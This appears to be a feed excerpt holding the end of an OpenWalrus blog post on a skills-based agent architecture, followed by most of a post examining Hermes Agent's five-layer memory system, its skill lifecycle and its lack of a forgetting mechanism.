template — instructions and patterns that tell an agent how to approach a&lt;br&gt;
domain, including which entity types and relationships to extract from&lt;br&gt;
conversations. MCP servers can register new entity types at runtime.&lt;br&gt;
The community writes them. Users mix and match them. The repo doesn't grow.&lt;/p&gt;

&lt;p&gt;This is the Unix philosophy applied to agent runtimes. Small tools that&lt;br&gt;
compose, not monolithic systems that configure.&lt;/p&gt;

&lt;h2&gt;
  
  
  Three layers of extension
&lt;/h2&gt;

&lt;p&gt;The "small core, open surface" idea plays out in a consistent&lt;br&gt;
three-layer model across every walrus subsystem — tools, memory, and&lt;br&gt;
entity types all follow the same pattern.&lt;/p&gt;

&lt;p&gt;&lt;em&gt;&lt;a href="https://openwalrus.xyz/blog/less-code-more-skills" rel="noopener noreferrer"&gt;Diagram — see original post&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Layer 1 — Framework built-ins.&lt;/strong&gt; The things only the core can provide.&lt;br&gt;
A filesystem tool, a shell tool, an HTTP client, four memory tools&lt;br&gt;
(&lt;code&gt;remember&lt;/code&gt;, &lt;code&gt;recall&lt;/code&gt;, &lt;code&gt;relate&lt;/code&gt;, &lt;code&gt;forget&lt;/code&gt;), and three base entity types&lt;br&gt;
(&lt;code&gt;Agent&lt;/code&gt;, &lt;code&gt;User&lt;/code&gt;, &lt;code&gt;Episode&lt;/code&gt;). This is the floor — always available,&lt;br&gt;
always correct.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Layer 2 — Skills.&lt;/strong&gt; Behavioral templates that tell the agent how to&lt;br&gt;
approach a domain. A coding skill declares entity types like &lt;code&gt;File&lt;/code&gt;,&lt;br&gt;
&lt;code&gt;TestFailure&lt;/code&gt;, &lt;code&gt;ArchDecision&lt;/code&gt; and teaches the agent how to extract them.&lt;br&gt;
A research skill declares &lt;code&gt;Paper&lt;/code&gt;, &lt;code&gt;Topic&lt;/code&gt;, &lt;code&gt;Citation&lt;/code&gt;. A DevOps skill&lt;br&gt;
teaches the agent to compose &lt;code&gt;kubectl&lt;/code&gt; and &lt;code&gt;terraform&lt;/code&gt; commands. Skills&lt;br&gt;
are a few hundred lines of behavioral description, not compiled code.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Layer 3 — MCP servers.&lt;/strong&gt; External capabilities connected at runtime.&lt;br&gt;
A Jira MCP registers &lt;code&gt;Ticket&lt;/code&gt;, &lt;code&gt;Sprint&lt;/code&gt;, &lt;code&gt;Epic&lt;/code&gt; as first-class entities.&lt;br&gt;
A GitHub MCP adds &lt;code&gt;PR&lt;/code&gt;, &lt;code&gt;Issue&lt;/code&gt;, &lt;code&gt;Commit&lt;/code&gt;. The agent's capability surface&lt;br&gt;
grows without any framework changes.&lt;/p&gt;

&lt;p&gt;Every subsystem follows this pattern. Memory isn't special. Tools aren't&lt;br&gt;
special. Entity types aren't special. The extension model is the same&lt;br&gt;
everywhere — which means learning it once is enough.&lt;/p&gt;
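&lt;p&gt;The three layers compose into one registry. A minimal sketch of the idea — the class and method names here are hypothetical, not walrus's actual API:&lt;/p&gt;

```python
# Illustrative sketch of the three-layer extension model for entity types.
# The layer names follow the post; the registry API itself is invented.
class EntityRegistry:
    def __init__(self):
        # Layer 1: framework built-ins, always available
        self.types = {"Agent", "User", "Episode"}

    def install_skill(self, skill_types):
        # Layer 2: a skill declares domain entity types
        self.types.update(skill_types)

    def connect_mcp(self, server_types):
        # Layer 3: an MCP server registers types at runtime
        self.types.update(server_types)

reg = EntityRegistry()
reg.install_skill({"File", "TestFailure", "ArchDecision"})  # coding skill
reg.connect_mcp({"Ticket", "Sprint", "Epic"})               # Jira MCP
print(sorted(reg.types))
```

The point of the sketch: layers 2 and 3 only ever add to the set the core defines, so the core itself never changes shape.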

&lt;h2&gt;
  
  
  Memory: the first test of the principle
&lt;/h2&gt;

&lt;p&gt;Memory was where we first applied "less code, more skills" — and where&lt;br&gt;
the principle proved itself.&lt;/p&gt;

&lt;p&gt;Our &lt;a href="https://openwalrus.xyz/blog/persistent-agent-memory-research" rel="noopener noreferrer"&gt;survey of existing memory systems&lt;/a&gt;&lt;br&gt;
showed every product building a comprehensive memory subsystem. Claude Code&lt;br&gt;
with markdown files and auto-memory. OpenClaw with SQLite + vectors and&lt;br&gt;
hybrid search. ChatGPT with a proprietary backend. Each is a bet on one&lt;br&gt;
particular memory layout being right for most users.&lt;/p&gt;

&lt;p&gt;Instead of building a universal memory framework with config files and&lt;br&gt;
journal directories, we collapsed everything into a single layer: a&lt;br&gt;
&lt;a href="https://openwalrus.xyz/blog/graph-vector-hybrid-memory" rel="noopener noreferrer"&gt;temporal knowledge graph&lt;/a&gt; backed by&lt;br&gt;
LanceDB + lance-graph. Agent identity, user preferences, conversation&lt;br&gt;
episodes, extracted entities — all graph nodes. Four tools to interact&lt;br&gt;
with it. Skills define &lt;em&gt;what&lt;/em&gt; to extract; the core handles &lt;em&gt;how&lt;/em&gt;.&lt;/p&gt;

&lt;p&gt;The memory schema grows with the agent's capability surface. Install a&lt;br&gt;
coding skill and &lt;code&gt;File&lt;/code&gt;, &lt;code&gt;TestFailure&lt;/code&gt; become extractable entity types.&lt;br&gt;
Connect a Jira MCP and &lt;code&gt;Ticket&lt;/code&gt;, &lt;code&gt;Sprint&lt;/code&gt; appear. No framework changes.&lt;br&gt;
No config files. The three-layer extension model does the work.&lt;/p&gt;

&lt;p&gt;Read the full deep-dive in&lt;br&gt;
&lt;a href="https://openwalrus.xyz/blog/graph-vector-hybrid-memory" rel="noopener noreferrer"&gt;Graph + vector: how OpenWalrus agents remember&lt;/a&gt;.&lt;/p&gt;

&lt;h2&gt;
  
  
  Beyond memory
&lt;/h2&gt;

&lt;p&gt;"Less code, more skills" isn't just a memory strategy. It's how we think&lt;br&gt;
about every feature request.&lt;/p&gt;

&lt;p&gt;When someone asks "can walrus browse the web?" — the answer isn't a&lt;br&gt;
built-in browser engine. It's an HTTP tool and a web browsing skill that&lt;br&gt;
knows how to navigate, extract, and summarize.&lt;/p&gt;

&lt;p&gt;When someone asks "can walrus manage my infrastructure?" — the answer&lt;br&gt;
isn't a built-in cloud SDK. It's a shell tool and a DevOps skill that&lt;br&gt;
knows how to compose &lt;code&gt;kubectl&lt;/code&gt;, &lt;code&gt;terraform&lt;/code&gt;, and &lt;code&gt;aws&lt;/code&gt; commands.&lt;/p&gt;

&lt;p&gt;When someone asks "can walrus do X?" — the answer is almost always:&lt;br&gt;
the tools already exist, we just need a skill.&lt;/p&gt;

&lt;p&gt;This keeps the repo compact. Every skill is a few hundred lines of&lt;br&gt;
behavioral description, not thousands of lines of compiled code. The&lt;br&gt;
core stays auditable. The binary stays small. And the ecosystem of what&lt;br&gt;
walrus can do grows without bound — because the community builds it,&lt;br&gt;
not us.&lt;/p&gt;

&lt;h2&gt;
  
  
  The tradeoff
&lt;/h2&gt;

&lt;p&gt;This isn't free. Pushing intelligence to skills means:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;The core tools have to be excellent.&lt;/strong&gt; If the built-in tools are
unreliable, no skill can compensate. This is where our engineering
effort goes — making the foundational layer rock-solid.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Quality varies.&lt;/strong&gt; Community skills won't all be good. Some will be
brilliant, most will be adequate, a few will be wrong. Curation and
testing matter.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Discovery is harder.&lt;/strong&gt; Users need to find the right skill for their
use case. This is a community infrastructure problem we haven't fully
solved yet.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Skills need good documentation.&lt;/strong&gt; A skill is only as useful as
its instructions are clear. Bad behavioral descriptions produce bad
agent behavior — garbage in, garbage out.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;But the alternative — baking every capability into the framework — is&lt;br&gt;
worse. It makes the repo unmaintainable, the binary bloated, and the&lt;br&gt;
system prompt overloaded. We'd rather have a small, correct core and a&lt;br&gt;
messy ecosystem than a bloated, fragile framework and no ecosystem at all.&lt;/p&gt;

&lt;h2&gt;
  
  
  Stop injecting, start enabling
&lt;/h2&gt;

&lt;p&gt;The system prompt was never meant to be a database. It was meant to be&lt;br&gt;
a brief set of instructions — who you are, how you behave, what tools&lt;br&gt;
you have. The moment we started using it as a persistence layer, we&lt;br&gt;
created a problem that no amount of engineering can solve.&lt;/p&gt;

&lt;p&gt;The fix isn't more framework code. It's better tools and shareable skills.&lt;/p&gt;

&lt;p&gt;Keep the core compact. Keep the surface open. Let agents and communities&lt;br&gt;
build the intelligence. Less code, more skills.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://openwalrus.xyz/docs/walrus/getting-started/installation" rel="noopener noreferrer"&gt;Get started with OpenWalrus →&lt;/a&gt;&lt;/p&gt;




&lt;p&gt;&lt;em&gt;Originally published at &lt;a href="https://openwalrus.xyz/blog/less-code-more-skills" rel="noopener noreferrer"&gt;OpenWalrus&lt;/a&gt;.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>ai</category>
      <category>architecture</category>
      <category>opensource</category>
      <category>openwalrus</category>
    </item>
    <item>
      <title>Hermes memory: five layers, one learning loop</title>
      <dc:creator>clearloop</dc:creator>
      <pubDate>Sun, 15 Mar 2026 17:51:22 +0000</pubDate>
      <link>https://forem.com/crabtalk/hermes-memory-five-layers-one-learning-loop-39gd</link>
      <guid>https://forem.com/crabtalk/hermes-memory-five-layers-one-learning-loop-39gd</guid>
      <description>&lt;p&gt;Hermes Agent remembers by doing. Complete a complex task, and it writes a SKILL.md — a step-by-step recipe it can retrieve next time. Ask it something personal, and Honcho derives a Theory of Mind snapshot from the conversation. Search for last week's work, and FTS5 pulls it from a SQLite index. Five memory layers, each solving a different temporal problem. No other open-source agent runtime attempts this much.&lt;/p&gt;

&lt;p&gt;We examined &lt;a href="https://github.com/NousResearch/hermes-agent" rel="noopener noreferrer"&gt;Hermes Agent&lt;/a&gt;'s memory architecture in depth — not the models or the terminal backends (we covered those in the &lt;a href="https://openwalrus.xyz/blog/hermes-agent-survey" rel="noopener noreferrer"&gt;runtime survey&lt;/a&gt;), but the memory system specifically. How the five layers interact, what each one costs, and what's missing.&lt;/p&gt;

&lt;h2&gt;
  
  
  Five layers, explained
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Layer 1: Short-term inference memory
&lt;/h3&gt;

&lt;p&gt;The context window. Every agent has this — it's the transformer's working memory for the current session. Hermes compresses at 50% context utilization (configurable) and caps tool orchestration at 90 iteration steps by default.&lt;/p&gt;

&lt;p&gt;Nothing survives a restart. This layer exists to be lost.&lt;/p&gt;

&lt;h3&gt;
  
  
  Layer 2: Procedural skill documents
&lt;/h3&gt;

&lt;p&gt;This is what makes Hermes's memory unique. When the agent completes a complex task — debugging a microservice, optimizing a pipeline — it autonomously writes a SKILL.md file capturing the step-by-step solution.&lt;/p&gt;

&lt;p&gt;The format follows the &lt;a href="https://agentskills.io/specification" rel="noopener noreferrer"&gt;agentskills.io&lt;/a&gt; standard:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Frontmatter&lt;/strong&gt;: &lt;code&gt;name&lt;/code&gt; (1-64 chars, lowercase + hyphens), &lt;code&gt;description&lt;/code&gt; (1-1024 chars), optional &lt;code&gt;license&lt;/code&gt;, &lt;code&gt;compatibility&lt;/code&gt;, &lt;code&gt;allowed-tools&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Directory structure&lt;/strong&gt;: &lt;code&gt;SKILL.md&lt;/code&gt; plus optional &lt;code&gt;scripts/&lt;/code&gt;, &lt;code&gt;references/&lt;/code&gt;, &lt;code&gt;assets/&lt;/code&gt; subdirectories&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Progressive disclosure&lt;/strong&gt;: metadata loaded always (~100 tokens), full SKILL.md loaded on activation (under 5,000 tokens recommended), resources loaded on-demand&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The creation trigger is the least documented part. It appears to be complexity-based — some heuristic of iteration count, tool calls, or solution novelty. The threshold isn't public, which makes it hard to predict when the agent will create a skill and when it won't.&lt;/p&gt;

&lt;p&gt;Skills are stored locally at &lt;code&gt;~/.hermes/memories/skills/&lt;/code&gt;. They're plain files — inspectable, editable, portable. The agentskills.io standard means skills created in Hermes can theoretically work in 11+ other tools that adopt the spec.&lt;/p&gt;

&lt;h3&gt;
  
  
  Layer 3: Contextual persistence
&lt;/h3&gt;

&lt;p&gt;A vector store indexes skill documents for workflow retrieval. When a new task resembles a past task, the system retrieves the relevant skill and uses it as a starting scaffold.&lt;/p&gt;

&lt;p&gt;This is where layers 2 and 3 interact: layer 2 creates skills, layer 3 makes them findable. Without contextual persistence, the agent would have to know which skill to load by name. With it, the agent describes the task, and the closest matching skill surfaces.&lt;/p&gt;
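&lt;p&gt;The retrieval half of that interaction can be sketched with a toy embedding. A real system would use a learned embedding model, but the shape is the same:&lt;/p&gt;

```python
# Sketch of the layer-2/layer-3 interaction: skills are embedded once,
# then the closest skill surfaces for a new task via cosine similarity.
# The bag-of-words "embedding" below is a stand-in for a real model.
import math
from collections import Counter

def embed(text: str) -> Counter:
    return Counter(text.lower().split())

def cosine(a: Counter, b: Counter) -> float:
    dot = sum(a[w] * b[w] for w in a)
    na = math.sqrt(sum(v * v for v in a.values()))
    nb = math.sqrt(sum(v * v for v in b.values()))
    return dot / (na * nb) if na and nb else 0.0

def retrieve(task: str, skills: dict[str, str]) -> str:
    """Return the name of the skill whose description best matches the task."""
    q = embed(task)
    return max(skills, key=lambda name: cosine(q, embed(skills[name])))
```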

&lt;h3&gt;
  
  
  Layer 4: User modeling via Honcho
&lt;/h3&gt;

&lt;p&gt;&lt;a href="https://honcho.dev/" rel="noopener noreferrer"&gt;Honcho&lt;/a&gt; is an external service from &lt;a href="https://github.com/plastic-labs/honcho" rel="noopener noreferrer"&gt;Plastic Labs&lt;/a&gt; that models users through what they call "dialectical reasoning." It doesn't store conversations — it derives conclusions from them.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The data model&lt;/strong&gt; is peer-centric with four primitives:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Primitive&lt;/th&gt;
&lt;th&gt;Purpose&lt;/th&gt;
&lt;th&gt;Scope&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Workspace&lt;/td&gt;
&lt;td&gt;Multi-tenant isolation&lt;/td&gt;
&lt;td&gt;Top-level container&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Peer&lt;/td&gt;
&lt;td&gt;Entity representation&lt;/td&gt;
&lt;td&gt;Both users and agents&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Session&lt;/td&gt;
&lt;td&gt;Interaction thread&lt;/td&gt;
&lt;td&gt;Temporal boundary&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Message&lt;/td&gt;
&lt;td&gt;Atomic data unit&lt;/td&gt;
&lt;td&gt;Conversations, events, documents&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;The key insight is that both users and agents are "peers" — this enables multi-participant reasoning, not just one-way user profiling.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;How it reasons&lt;/strong&gt;: Custom reasoning models process messages asynchronously in the background, deriving Representations — Theory of Mind snapshots about each peer. These aren't raw transcripts. They're conclusions: "User has 10+ years Rust experience," "User prefers async communication," "User is working on a migration project."&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;How agents query it&lt;/strong&gt;: Three retrieval methods:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;&lt;code&gt;get_context()&lt;/code&gt;&lt;/strong&gt; — returns a combination of messages, conclusions, and summaries up to a token budget. ~200ms latency.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;&lt;code&gt;search()&lt;/code&gt;&lt;/strong&gt; — hybrid text + semantic search across workspace, peer, or session scope.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Dialectic chat&lt;/strong&gt; — natural language queries to Honcho. The agent asks "What does this user care about?" and gets a reasoned answer, not a database row.&lt;/li&gt;
&lt;/ol&gt;
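&lt;p&gt;The "conclusions, not transcripts" idea can be illustrated with a toy reasoner. This is a stand-in for Honcho's background reasoning models, not its SDK:&lt;/p&gt;

```python
# Toy model of derived Representations: messages go in, only derived
# facts persist, and the raw messages can then be discarded. A keyword
# heuristic stands in for Honcho's reasoning models.

def derive_representation(messages: list[str]) -> set[str]:
    """Derive conclusions from message evidence; return facts only."""
    facts = set()
    text = " ".join(messages).lower()
    if "rust" in text:
        facts.add("user works with Rust")
    if "prefer" in text and "typescript" in text:
        facts.add("user prefers TypeScript")
    return facts
```

&lt;p&gt;The tradeoff described below falls out directly: once the messages are gone, a wrong conclusion cannot be re-checked against its source.&lt;/p&gt;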

&lt;p&gt;&lt;strong&gt;Configuration&lt;/strong&gt;: enabled via &lt;code&gt;user_profile_enabled: true&lt;/code&gt; and a &lt;code&gt;HONCHO_API_KEY&lt;/code&gt; in &lt;code&gt;~/.hermes/config.yaml&lt;/code&gt;. This is the only layer that requires an external service.&lt;/p&gt;

&lt;h3&gt;
  
  
  Layer 5: Full-text search (FTS5)
&lt;/h3&gt;

&lt;p&gt;SQLite FTS5 indexes all past interactions with LLM-powered summarization. Not raw logs — the system summarizes sessions before indexing, reducing noise and context pollution.&lt;/p&gt;

&lt;p&gt;This layer answers temporal queries: "What did I do last Tuesday?" "What was the error I hit in the auth service last week?" Cross-session recall that the context window can't provide and that skill documents don't capture (skills are procedural, not episodic).&lt;/p&gt;
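&lt;p&gt;This layer is reproducible in a few lines of Python, assuming your SQLite build includes FTS5 (most modern builds do). Table and column names here are illustrative:&lt;/p&gt;

```python
# Layer 5 in miniature: an FTS5 virtual table of session summaries,
# queried with full-text MATCH. Schema and data are illustrative.
import sqlite3

con = sqlite3.connect(":memory:")
con.execute("CREATE VIRTUAL TABLE sessions USING fts5(date, summary)")
con.executemany(
    "INSERT INTO sessions VALUES (?, ?)",
    [("2026-03-10", "fixed token refresh error in the auth service"),
     ("2026-03-12", "optimized the ingest pipeline batch size")],
)

# Temporal-style query: which session mentioned the auth error?
row = con.execute(
    "SELECT date FROM sessions WHERE sessions MATCH 'auth error'"
).fetchone()
```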

&lt;p&gt;&lt;em&gt;&lt;a href="https://openwalrus.xyz/blog/hermes-memory-system" rel="noopener noreferrer"&gt;Diagram — see original post&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Every layer feeds back into the context window. The closed loop: tasks produce skills, skills improve future tasks, Honcho builds an evolving user model, FTS5 provides temporal recall. Each session is supposed to make the next one better.&lt;/p&gt;

&lt;h2&gt;
  
  
  The closed learning loop
&lt;/h2&gt;

&lt;p&gt;The theory is compelling. An agent that gets better over time:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Agent completes a task → writes SKILL.md&lt;/li&gt;
&lt;li&gt;Next similar task → vector store retrieves the skill → agent starts from a scaffold instead of zero&lt;/li&gt;
&lt;li&gt;Honcho observes the user → derives preferences → future sessions are personalized&lt;/li&gt;
&lt;li&gt;FTS5 indexes everything → temporal recall available across sessions&lt;/li&gt;
&lt;/ol&gt;
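&lt;p&gt;The four steps above, reduced to control flow. Every component here is a stand-in for the corresponding layer; the point is the data flow between them:&lt;/p&gt;

```python
# Sketch of the closed loop: each session reads from and writes back to
# the persistent layers. All names and structures are illustrative.

def run_session(task, skills, index, user_model, fts_log):
    skill = index.get(task)                     # layer 3: retrieve scaffold
    result = f"solved:{task}" + (f" using {skill}" if skill else "")
    skills[task] = f"steps for {task}"          # layer 2: write SKILL.md
    index[task] = task                          # layer 3: index the skill
    user_model.add(f"user asked about {task}")  # layer 4: observe the user
    fts_log.append(result)                      # layer 5: episodic record
    return result
```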

&lt;p&gt;The question is whether this compounds in practice. We found no published benchmarks measuring skill reuse rates, user model accuracy over time, or degradation curves. The loop is well-designed in theory — the evidence gap is how it performs after months of heavy use.&lt;/p&gt;

&lt;h2&gt;
  
  
  Honcho: the user modeling question
&lt;/h2&gt;

&lt;p&gt;Honcho's approach is fundamentally different from both &lt;a href="https://openwalrus.xyz/blog/mem0-memory-architecture" rel="noopener noreferrer"&gt;Mem0's scope-based model&lt;/a&gt; and walrus's graph-based model.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Mem0&lt;/strong&gt; organizes memory by scope (conversation, session, user) and uses an LLM extraction pipeline to decide what goes where. The intelligence is in the extraction.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Walrus&lt;/strong&gt; uses a single graph (LanceDB + lance-graph) with typed entities and explicit agent tools. The intelligence is in the agent — it decides what to remember.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Honcho&lt;/strong&gt; derives conclusions from conversations without storing them. The intelligence is in the reasoning model that produces Representations. It doesn't store "user said they prefer TypeScript in message #47." It stores "user prefers TypeScript" as a derived fact.&lt;/p&gt;

&lt;p&gt;This is closer to how humans remember — we forget the conversation, remember the conclusion. The risk is the same as with human memory: the conclusion might be wrong, and you can't go back to the source to verify.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Does it work?&lt;/strong&gt; Honcho &lt;a href="https://docs.honcho.to/" rel="noopener noreferrer"&gt;claims&lt;/a&gt; improved personalization and context-awareness. &lt;a href="https://blog.plasticlabs.ai/blog/Honcho-3" rel="noopener noreferrer"&gt;Honcho 3.0&lt;/a&gt; added faster context retrieval and smarter embedding reuse. But we found no published A/B tests or benchmarks comparing agent performance with and without Honcho enabled. The contribution of user modeling to actual task completion is an open empirical question.&lt;/p&gt;

&lt;p&gt;&lt;em&gt;[Interactive chart — see original post]&lt;/em&gt;&lt;br&gt;
The radar shows Hermes dominating on procedural memory and user modeling — the two capabilities that distinguish it from every other system. The gap on forgetting/decay is the most striking: Hermes scores 1 out of 10. It has no mechanism to forget.&lt;/p&gt;
&lt;h2&gt;
  
  
  Skill lifecycle: creation, retrieval, decay
&lt;/h2&gt;

&lt;p&gt;Skills are Hermes's most original contribution. But the lifecycle has gaps.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Creation&lt;/strong&gt;: autonomous, triggered by complexity heuristics. The threshold is undocumented — this makes it unpredictable. An agent might create a skill for a trivial task or miss a complex one.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Retrieval&lt;/strong&gt;: vector similarity via the contextual persistence layer. The right skill surfaces for similar tasks. This works well when skill names and descriptions are distinctive. It works less well when skills overlap (three skills for "deploy to staging" created at different times with slightly different approaches).&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;What's missing&lt;/strong&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Deduplication&lt;/strong&gt;: No mechanism to detect that two skills solve the same problem. Mem0 uses cosine similarity (0.85 threshold) to merge near-duplicates. Hermes doesn't.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Versioning&lt;/strong&gt;: No way to track skill evolution. If the agent rewrites a skill, the old version is gone.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Expiration&lt;/strong&gt;: Skills never expire. A skill for "deploy to staging via Jenkins" persists long after you've migrated to GitHub Actions.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Conflict detection&lt;/strong&gt;: Two skills with contradictory advice ("always use yarn" vs "always use pnpm") can coexist without any system-level awareness.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;em&gt;[Interactive chart — see original post]&lt;/em&gt;&lt;br&gt;
Hermes leads on auto-creation and portability (agentskills.io). Mem0 leads on deduplication. Nobody scores well on versioning. The expiration row is telling — Hermes scores 0, meaning skills accumulate indefinitely.&lt;/p&gt;
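&lt;p&gt;A minimal dedup pass is not much code. The sketch below flags redundant skill pairs, using difflib's ratio as a simple stand-in for embedding cosine similarity (Mem0 reportedly merges above a 0.85 cosine threshold):&lt;/p&gt;

```python
# Flag skill pairs whose descriptions look redundant. SequenceMatcher
# ratio stands in for cosine similarity over embeddings; the 0.85
# threshold mirrors the Mem0 figure cited above.
from difflib import SequenceMatcher
from itertools import combinations

def near_duplicates(skills: dict[str, str], threshold: float = 0.85):
    """Yield pairs of skill names whose descriptions exceed the threshold."""
    for (a, da), (b, db) in combinations(skills.items(), 2):
        if SequenceMatcher(None, da, db).ratio() >= threshold:
            yield (a, b)
```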
&lt;h2&gt;
  
  
  What's missing: forgetting
&lt;/h2&gt;

&lt;p&gt;None of the five layers has a documented forgetting mechanism.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Skills&lt;/strong&gt; accumulate in &lt;code&gt;~/.hermes/memories/skills/&lt;/code&gt; with no pruning&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;FTS5 index&lt;/strong&gt; grows with every session, no summarization decay&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Honcho representations&lt;/strong&gt; persist indefinitely — derived facts are never invalidated&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Vector store&lt;/strong&gt; indexes grow with the skill collection&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Contrast this with:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Mem0's DELETE operation&lt;/strong&gt; — the extraction pipeline can explicitly remove contradicted memories&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Walrus's compact and distill tools&lt;/strong&gt; — imperfect, but the agent can at least consolidate and prune&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Cognitive science&lt;/strong&gt; — Ebbinghaus decay curves suggest unused memories should fade. No agent framework implements this&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The absence of forgetting is a design choice, not an oversight. Hermes bets that more memory is always better than less. This works at small scale. At 10,000+ skills and years of FTS5 logs, the signal-to-noise ratio is an open question. We explored the broader patterns of memory growth in our survey of &lt;a href="https://openwalrus.xyz/blog/persistent-agent-memory-research" rel="noopener noreferrer"&gt;persistent agent memory&lt;/a&gt;, and the &lt;a href="https://openwalrus.xyz/blog/context-compaction" rel="noopener noreferrer"&gt;context compaction survey&lt;/a&gt; covers how frameworks handle the related overflow problem.&lt;/p&gt;
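&lt;p&gt;For concreteness, an Ebbinghaus-style policy would look something like this: retention decays as R = exp(-t/S) with time since last use, and memories below a cutoff get pruned. This is a hypothetical sketch; as noted above, no surveyed framework implements it:&lt;/p&gt;

```python
# Exponential forgetting curve: R = exp(-t/S), where t is days since
# last use and S is a stability constant. Values are illustrative.
import math

def retention(days_since_use: float, stability: float = 30.0) -> float:
    return math.exp(-days_since_use / stability)

def prune(memories: dict[str, float], cutoff: float = 0.2) -> dict[str, float]:
    """Keep only memories (name -> days since last use) still above the cutoff."""
    return {name: age for name, age in memories.items()
            if retention(age) >= cutoff}
```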
&lt;h2&gt;
  
  
  Infrastructure cost
&lt;/h2&gt;

&lt;p&gt;Hermes's memory is cheaper to run than it looks. Three of five layers are local:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Layer&lt;/th&gt;
&lt;th&gt;Runs locally&lt;/th&gt;
&lt;th&gt;External service&lt;/th&gt;
&lt;th&gt;LLM calls&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Context window&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;None&lt;/td&gt;
&lt;td&gt;0 per op&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Skills (SKILL.md)&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;None&lt;/td&gt;
&lt;td&gt;1 (creation only)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Contextual (vector)&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;None&lt;/td&gt;
&lt;td&gt;0 per op&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Honcho (user model)&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;Honcho API&lt;/td&gt;
&lt;td&gt;1+ per session&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;FTS5 (search)&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;None&lt;/td&gt;
&lt;td&gt;0 per query&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Configuration lives in &lt;code&gt;~/.hermes/config.yaml&lt;/code&gt;:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;memory&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;memory_enabled&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;
  &lt;span class="na"&gt;user_profile_enabled&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;    &lt;span class="c1"&gt;# requires HONCHO_API_KEY&lt;/span&gt;
  &lt;span class="na"&gt;memory_char_limit&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;2200&lt;/span&gt;       &lt;span class="c1"&gt;# ~800 tokens for MEMORY.md&lt;/span&gt;
